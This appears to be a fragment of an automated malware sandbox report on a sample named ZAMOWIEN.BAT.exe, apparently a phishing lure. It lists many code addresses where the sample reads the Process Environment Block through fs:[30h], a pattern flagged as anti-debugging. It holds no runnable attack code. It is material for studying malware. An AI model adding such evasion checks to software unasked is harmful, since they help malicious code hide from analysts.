            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EF172 mov eax, dword ptr fs:[00000030h]4_2_327EF172
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EF172 mov eax, dword ptr fs:[00000030h]4_2_327EF172
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EF172 mov eax, dword ptr fs:[00000030h]4_2_327EF172
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EF172 mov eax, dword ptr fs:[00000030h]4_2_327EF172
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EF172 mov eax, dword ptr fs:[00000030h]4_2_327EF172
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EF172 mov eax, dword ptr fs:[00000030h]4_2_327EF172
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EF172 mov eax, dword ptr fs:[00000030h]4_2_327EF172
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EF172 mov eax, dword ptr fs:[00000030h]4_2_327EF172
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EF172 mov eax, dword ptr fs:[00000030h]4_2_327EF172
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EF172 mov eax, dword ptr fs:[00000030h]4_2_327EF172
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EF172 mov eax, dword ptr fs:[00000030h]4_2_327EF172
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EF172 mov eax, dword ptr fs:[00000030h]4_2_327EF172
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EF172 mov eax, dword ptr fs:[00000030h]4_2_327EF172
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32847190 mov eax, dword ptr fs:[00000030h]4_2_32847190
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327F7152 mov eax, dword ptr fs:[00000030h]4_2_327F7152
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328A11A4 mov eax, dword ptr fs:[00000030h]4_2_328A11A4
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328A11A4 mov eax, dword ptr fs:[00000030h]4_2_328A11A4
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328A11A4 mov eax, dword ptr fs:[00000030h]4_2_328A11A4
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328A11A4 mov eax, dword ptr fs:[00000030h]4_2_328A11A4
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3280B1B0 mov eax, dword ptr fs:[00000030h]4_2_3280B1B0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327E9148 mov eax, dword ptr fs:[00000030h]4_2_327E9148
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327E9148 mov eax, dword ptr fs:[00000030h]4_2_327E9148
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327E9148 mov eax, dword ptr fs:[00000030h]4_2_327E9148
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327E9148 mov eax, dword ptr fs:[00000030h]4_2_327E9148
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328C51CB mov eax, dword ptr fs:[00000030h]4_2_328C51CB
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EB136 mov eax, dword ptr fs:[00000030h]4_2_327EB136
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EB136 mov eax, dword ptr fs:[00000030h]4_2_327EB136
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EB136 mov eax, dword ptr fs:[00000030h]4_2_327EB136
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EB136 mov eax, dword ptr fs:[00000030h]4_2_327EB136
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327F1131 mov eax, dword ptr fs:[00000030h]4_2_327F1131
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327F1131 mov eax, dword ptr fs:[00000030h]4_2_327F1131
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3282D1D0 mov eax, dword ptr fs:[00000030h]4_2_3282D1D0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3282D1D0 mov ecx, dword ptr fs:[00000030h]4_2_3282D1D0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328C31E1 mov eax, dword ptr fs:[00000030h]4_2_328C31E1
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328151EF mov eax, dword ptr fs:[00000030h]4_2_328151EF
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328151EF mov eax, dword ptr fs:[00000030h]4_2_328151EF
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328151EF mov eax, dword ptr fs:[00000030h]4_2_328151EF
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328151EF mov eax, dword ptr fs:[00000030h]4_2_328151EF
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328151EF mov eax, dword ptr fs:[00000030h]4_2_328151EF
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328151EF mov eax, dword ptr fs:[00000030h]4_2_328151EF
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328151EF mov eax, dword ptr fs:[00000030h]4_2_328151EF
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328151EF mov eax, dword ptr fs:[00000030h]4_2_328151EF
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328151EF mov eax, dword ptr fs:[00000030h]4_2_328151EF
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328151EF mov eax, dword ptr fs:[00000030h]4_2_328151EF
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328151EF mov eax, dword ptr fs:[00000030h]4_2_328151EF
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328151EF mov eax, dword ptr fs:[00000030h]4_2_328151EF
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328151EF mov eax, dword ptr fs:[00000030h]4_2_328151EF
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328971F9 mov esi, dword ptr fs:[00000030h]4_2_328971F9
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327F51ED mov eax, dword ptr fs:[00000030h]4_2_327F51ED
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328C7120 mov eax, dword ptr fs:[00000030h]4_2_328C7120
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32883140 mov eax, dword ptr fs:[00000030h]4_2_32883140
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32883140 mov eax, dword ptr fs:[00000030h]4_2_32883140
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32883140 mov eax, dword ptr fs:[00000030h]4_2_32883140
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328C5152 mov eax, dword ptr fs:[00000030h]4_2_328C5152
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32889179 mov eax, dword ptr fs:[00000030h]4_2_32889179
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3287368C mov eax, dword ptr fs:[00000030h]4_2_3287368C
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3287368C mov eax, dword ptr fs:[00000030h]4_2_3287368C
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3287368C mov eax, dword ptr fs:[00000030h]4_2_3287368C
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3287368C mov eax, dword ptr fs:[00000030h]4_2_3287368C
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328B16CC mov eax, dword ptr fs:[00000030h]4_2_328B16CC
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328B16CC mov eax, dword ptr fs:[00000030h]4_2_328B16CC
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328B16CC mov eax, dword ptr fs:[00000030h]4_2_328B16CC
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328B16CC mov eax, dword ptr fs:[00000030h]4_2_328B16CC
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328AF6C7 mov eax, dword ptr fs:[00000030h]4_2_328AF6C7
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328216CF mov eax, dword ptr fs:[00000030h]4_2_328216CF
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EF626 mov eax, dword ptr fs:[00000030h]4_2_327EF626
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EF626 mov eax, dword ptr fs:[00000030h]4_2_327EF626
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EF626 mov eax, dword ptr fs:[00000030h]4_2_327EF626
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EF626 mov eax, dword ptr fs:[00000030h]4_2_327EF626
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EF626 mov eax, dword ptr fs:[00000030h]4_2_327EF626
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EF626 mov eax, dword ptr fs:[00000030h]4_2_327EF626
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EF626 mov eax, dword ptr fs:[00000030h]4_2_327EF626
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EF626 mov eax, dword ptr fs:[00000030h]4_2_327EF626
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EF626 mov eax, dword ptr fs:[00000030h]4_2_327EF626
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281D6E0 mov eax, dword ptr fs:[00000030h]4_2_3281D6E0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281D6E0 mov eax, dword ptr fs:[00000030h]4_2_3281D6E0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328836EE mov eax, dword ptr fs:[00000030h]4_2_328836EE
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328836EE mov eax, dword ptr fs:[00000030h]4_2_328836EE
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328836EE mov eax, dword ptr fs:[00000030h]4_2_328836EE
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328836EE mov eax, dword ptr fs:[00000030h]4_2_328836EE
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328836EE mov eax, dword ptr fs:[00000030h]4_2_328836EE
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328836EE mov eax, dword ptr fs:[00000030h]4_2_328836EE
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327F3616 mov eax, dword ptr fs:[00000030h]4_2_327F3616
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327F3616 mov eax, dword ptr fs:[00000030h]4_2_327F3616
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328AD6F0 mov eax, dword ptr fs:[00000030h]4_2_328AD6F0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3282F603 mov eax, dword ptr fs:[00000030h]4_2_3282F603
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32821607 mov eax, dword ptr fs:[00000030h]4_2_32821607
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328C5636 mov eax, dword ptr fs:[00000030h]4_2_328C5636
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327FB6C0 mov eax, dword ptr fs:[00000030h]4_2_327FB6C0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327FB6C0 mov eax, dword ptr fs:[00000030h]4_2_327FB6C0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327FB6C0 mov eax, dword ptr fs:[00000030h]4_2_327FB6C0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327FB6C0 mov eax, dword ptr fs:[00000030h]4_2_327FB6C0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327FB6C0 mov eax, dword ptr fs:[00000030h]4_2_327FB6C0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327FB6C0 mov eax, dword ptr fs:[00000030h]4_2_327FB6C0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327E76B2 mov eax, dword ptr fs:[00000030h]4_2_327E76B2
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327E76B2 mov eax, dword ptr fs:[00000030h]4_2_327E76B2
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327E76B2 mov eax, dword ptr fs:[00000030h]4_2_327E76B2
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327ED6AA mov eax, dword ptr fs:[00000030h]4_2_327ED6AA
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327ED6AA mov eax, dword ptr fs:[00000030h]4_2_327ED6AA
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32829660 mov eax, dword ptr fs:[00000030h]4_2_32829660
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32829660 mov eax, dword ptr fs:[00000030h]4_2_32829660
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3288D660 mov eax, dword ptr fs:[00000030h]4_2_3288D660
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328AF78A mov eax, dword ptr fs:[00000030h]4_2_328AF78A
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EB765 mov eax, dword ptr fs:[00000030h]4_2_327EB765
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EB765 mov eax, dword ptr fs:[00000030h]4_2_327EB765
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EB765 mov eax, dword ptr fs:[00000030h]4_2_327EB765
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EB765 mov eax, dword ptr fs:[00000030h]4_2_327EB765
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3287F7AF mov eax, dword ptr fs:[00000030h]4_2_3287F7AF
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3287F7AF mov eax, dword ptr fs:[00000030h]4_2_3287F7AF
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3287F7AF mov eax, dword ptr fs:[00000030h]4_2_3287F7AF
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3287F7AF mov eax, dword ptr fs:[00000030h]4_2_3287F7AF
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3287F7AF mov eax, dword ptr fs:[00000030h]4_2_3287F7AF
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328797A9 mov eax, dword ptr fs:[00000030h]4_2_328797A9
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281D7B0 mov eax, dword ptr fs:[00000030h]4_2_3281D7B0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328C37B6 mov eax, dword ptr fs:[00000030h]4_2_328C37B6
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328AD7B0 mov eax, dword ptr fs:[00000030h]4_2_328AD7B0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328AD7B0 mov eax, dword ptr fs:[00000030h]4_2_328AD7B0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327F973A mov eax, dword ptr fs:[00000030h]4_2_327F973A
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327F973A mov eax, dword ptr fs:[00000030h]4_2_327F973A
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327E9730 mov eax, dword ptr fs:[00000030h]4_2_327E9730
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327E9730 mov eax, dword ptr fs:[00000030h]4_2_327E9730
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327F3720 mov eax, dword ptr fs:[00000030h]4_2_327F3720
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327F7703 mov eax, dword ptr fs:[00000030h]4_2_327F7703
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327F5702 mov eax, dword ptr fs:[00000030h]4_2_327F5702
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327F5702 mov eax, dword ptr fs:[00000030h]4_2_327F5702
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3282F71F mov eax, dword ptr fs:[00000030h]4_2_3282F71F
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3282F71F mov eax, dword ptr fs:[00000030h]4_2_3282F71F
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327FD7E0 mov ecx, dword ptr fs:[00000030h]4_2_327FD7E0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3280F720 mov eax, dword ptr fs:[00000030h]4_2_3280F720
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3280F720 mov eax, dword ptr fs:[00000030h]4_2_3280F720
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3280F720 mov eax, dword ptr fs:[00000030h]4_2_3280F720
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328B972B mov eax, dword ptr fs:[00000030h]4_2_328B972B
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328AF72E mov eax, dword ptr fs:[00000030h]4_2_328AF72E
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328CB73C mov eax, dword ptr fs:[00000030h]4_2_328CB73C
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328CB73C mov eax, dword ptr fs:[00000030h]4_2_328CB73C
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328CB73C mov eax, dword ptr fs:[00000030h]4_2_328CB73C
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328CB73C mov eax, dword ptr fs:[00000030h]4_2_328CB73C
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32825734 mov eax, dword ptr fs:[00000030h]4_2_32825734
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327F57C0 mov eax, dword ptr fs:[00000030h]4_2_327F57C0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327F57C0 mov eax, dword ptr fs:[00000030h]4_2_327F57C0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327F57C0 mov eax, dword ptr fs:[00000030h]4_2_327F57C0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32803740 mov eax, dword ptr fs:[00000030h]4_2_32803740
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32803740 mov eax, dword ptr fs:[00000030h]4_2_32803740
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32803740 mov eax, dword ptr fs:[00000030h]4_2_32803740
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EF7BA mov eax, dword ptr fs:[00000030h]4_2_327EF7BA
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EF7BA mov eax, dword ptr fs:[00000030h]4_2_327EF7BA
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EF7BA mov eax, dword ptr fs:[00000030h]4_2_327EF7BA
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EF7BA mov eax, dword ptr fs:[00000030h]4_2_327EF7BA
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EF7BA mov eax, dword ptr fs:[00000030h]4_2_327EF7BA
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EF7BA mov eax, dword ptr fs:[00000030h]4_2_327EF7BA
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EF7BA mov eax, dword ptr fs:[00000030h]4_2_327EF7BA
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EF7BA mov eax, dword ptr fs:[00000030h]4_2_327EF7BA
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EF7BA mov eax, dword ptr fs:[00000030h]4_2_327EF7BA
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328C3749 mov eax, dword ptr fs:[00000030h]4_2_328C3749
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3289375F mov eax, dword ptr fs:[00000030h]4_2_3289375F
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3289375F mov eax, dword ptr fs:[00000030h]4_2_3289375F
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3289375F mov eax, dword ptr fs:[00000030h]4_2_3289375F
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3289375F mov eax, dword ptr fs:[00000030h]4_2_3289375F
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3289375F mov eax, dword ptr fs:[00000030h]4_2_3289375F
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327F1460 mov eax, dword ptr fs:[00000030h]4_2_327F1460
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327F1460 mov eax, dword ptr fs:[00000030h]4_2_327F1460
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327F1460 mov eax, dword ptr fs:[00000030h]4_2_327F1460
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327F1460 mov eax, dword ptr fs:[00000030h]4_2_327F1460
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327F1460 mov eax, dword ptr fs:[00000030h]4_2_327F1460
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328234B0 mov eax, dword ptr fs:[00000030h]4_2_328234B0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328974B0 mov eax, dword ptr fs:[00000030h]4_2_328974B0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327FB440 mov eax, dword ptr fs:[00000030h]4_2_327FB440
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327FB440 mov eax, dword ptr fs:[00000030h]4_2_327FB440
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327FB440 mov eax, dword ptr fs:[00000030h]4_2_327FB440
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327FB440 mov eax, dword ptr fs:[00000030h]4_2_327FB440
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327FB440 mov eax, dword ptr fs:[00000030h]4_2_327FB440
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327FB440 mov eax, dword ptr fs:[00000030h]4_2_327FB440
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328C54DB mov eax, dword ptr fs:[00000030h]4_2_328C54DB
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328994E0 mov eax, dword ptr fs:[00000030h]4_2_328994E0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281340D mov eax, dword ptr fs:[00000030h]4_2_3281340D
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32877410 mov eax, dword ptr fs:[00000030h]4_2_32877410
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327E74B0 mov eax, dword ptr fs:[00000030h]4_2_327E74B0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327E74B0 mov eax, dword ptr fs:[00000030h]4_2_327E74B0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328AF453 mov eax, dword ptr fs:[00000030h]4_2_328AF453
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3289B450 mov eax, dword ptr fs:[00000030h]4_2_3289B450
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3289B450 mov eax, dword ptr fs:[00000030h]4_2_3289B450
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3289B450 mov eax, dword ptr fs:[00000030h]4_2_3289B450
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3289B450 mov eax, dword ptr fs:[00000030h]4_2_3289B450
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3280F460 mov eax, dword ptr fs:[00000030h]4_2_3280F460
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3280F460 mov eax, dword ptr fs:[00000030h]4_2_3280F460
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3280F460 mov eax, dword ptr fs:[00000030h]4_2_3280F460
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3280F460 mov eax, dword ptr fs:[00000030h]4_2_3280F460
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3280F460 mov eax, dword ptr fs:[00000030h]4_2_3280F460
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3280F460 mov eax, dword ptr fs:[00000030h]4_2_3280F460
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328C547F mov eax, dword ptr fs:[00000030h]4_2_328C547F
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327F9486 mov eax, dword ptr fs:[00000030h]4_2_327F9486
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327F9486 mov eax, dword ptr fs:[00000030h]4_2_327F9486
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EB480 mov eax, dword ptr fs:[00000030h]4_2_327EB480
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3287B594 mov eax, dword ptr fs:[00000030h]4_2_3287B594
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3287B594 mov eax, dword ptr fs:[00000030h]4_2_3287B594
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EB562 mov eax, dword ptr fs:[00000030h]4_2_327EB562
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328115A9 mov eax, dword ptr fs:[00000030h]4_2_328115A9
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328115A9 mov eax, dword ptr fs:[00000030h]4_2_328115A9
